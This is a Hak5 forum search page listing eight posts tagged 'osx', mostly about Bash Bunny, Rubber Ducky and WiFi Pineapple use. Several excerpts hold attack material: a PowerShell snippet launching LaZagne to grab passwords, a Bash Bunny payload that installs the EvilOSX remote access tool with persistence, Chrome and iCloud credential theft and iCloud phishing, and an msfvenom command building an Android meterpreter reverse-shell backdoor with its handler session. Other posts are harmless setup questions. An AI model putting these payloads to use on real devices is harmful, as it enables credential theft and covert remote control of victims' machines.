Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'osx'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Found 8 results

  1. Trying to make a payload for a password grabber for mac osx having trouble with it while using the bash bunny. Can anyone help with my code? $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) Start-Process -FilePath ((-f 'label=''BashBunny''').Name+'payloads\switch2\laZagne.exe') -ArgumentList 'all -oN' -RedirectStandardOutput (( -f 'label=''BashBunny''').Name+'loot\PasswordGrabber\computer_' + $filecount +'.txt')
  2. having just bought the Bashbunny today i was so excited to get it working and do all sorts of things with it after having to wait for a week for it to ship to where i live :3, when i got it i updated the firmware using the osx bashbunny updater tool which worked great and that had me think that it was all going to be smooth sailing from there, but i got this feeling that things that have to do with IT never ever work that simply (at least with me) and luck would have it that i didn't have my windows box with me as i am traveling and i carry my mac with me as it is my daily driver. The suffering began when i wanted to share the internet connection with the bunny via the method which involves running a squid proxy, i followed the guide to the letter, but for some reason or another i couldn't run squid with the -Z command nor did i get it to work for me, after long hours of fiddling with it i decided to give up on that method and tried to look in the forum as well as youtube for another solution i found people suggesting running a payload which will test the connection, and fiddling with the internet sharing in mac (which gave me a massive headache because at times it would let me ssh to the bunny and disconnect the internet from my pc or it would let use the internet and not be able to ssh into the bunny) in the end i almost cried while staring at my terminal window with lifeless eye's it dawned on me that i have a very small linux box that i carry around with me (because in my head it makes sense and i convince myself that i'll find some use for it sometime) The raspberry pi which i lugg around which i haven't used for a while proved to be my savior, and so i boot it up i run the guided setup script and it works. but imagine this i'm sitting in my moms house on a sofa with a macbook connected to a raspberry pi connected to a bashbunny for the soul reason of wanting to update the linux distro on the bash bunny. Ps: the Guided Setup had me walk the walk of shame a couple of times during the setup process where it made you disconnect the bunny and connect it again. This might not be relevant to the topics that people usually post here (sorry if that's the case) but i had a lot of fun with this and i wanted to share it with someone xD.
  3. stekole

    [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server root@kali:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  4. hackRecorded

    meterpreter stuck on OSX metasploit

    I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost lhost => msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on msf exploit(handler) > [*] Sending stage (69089 bytes) to [*] Meterpreter session 1 opened ( -> at 2017-10-19 23:02:02 +0700
  5. koby85

    ° sign instead of >

    Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry which should be fine: ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 > On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this work on my Mac as well. Do you have any tips? Thanks, David
  6. Hi, My MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If i do the same on a Linux machine it works fine. I can easily log in to the web interface on Subsequent sessions may be quickly connected using saved settings. [C]onnect using saved settings [G]uided setup (recommended) [M]anual setup [A]dvanced IP settings [Q]uit Step 1 of 3: Select Default Gateway Default gateway reported as Use the above reported default gateway? [Y/n]? Y Step 2 of 3: Select Internet Interface Internet interface reported as en0 Use the above reported Internet interface? [Y/n]? Y Step 3 of 3: Select WiFi Pineapple Interface Please connect the WiFi Pineapple to this computer. ................................................... ...................................................
  7. jafahulo

    [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  8. RichardNixon

    Can't access Nano

    I can't even seem to connect to my new Nano there is no response on I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ??? Ifconfig output is below - and screen show is attached ... I'm stuck !!! Any ideas ? Is there a way to Hard Reset ?? ------------------------------------- en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 options=4<VLAN_MTU> ether 00:c0:ca:8f:b6:11 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa nd6 options=1<PERFORMNUD> media: autoselect (100baseTX <full-duplex,flow-control>) status: active bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 options=3<RXCSUM,TXCSUM> ether 9a:e0:d9:79:10:64 inet netmask 0xffffff00 broadcast inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb Configuration: id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0 maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200 root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0 ipfilter disabled flags 0x2 member: en5 flags=3<LEARNING,DISCOVER> ifmaxaddr 0 port 10 priority 0 path cost 0 nd6 options=1<PERFORMNUD> media: autoselect status: active pineapple-setup-stuck.pdf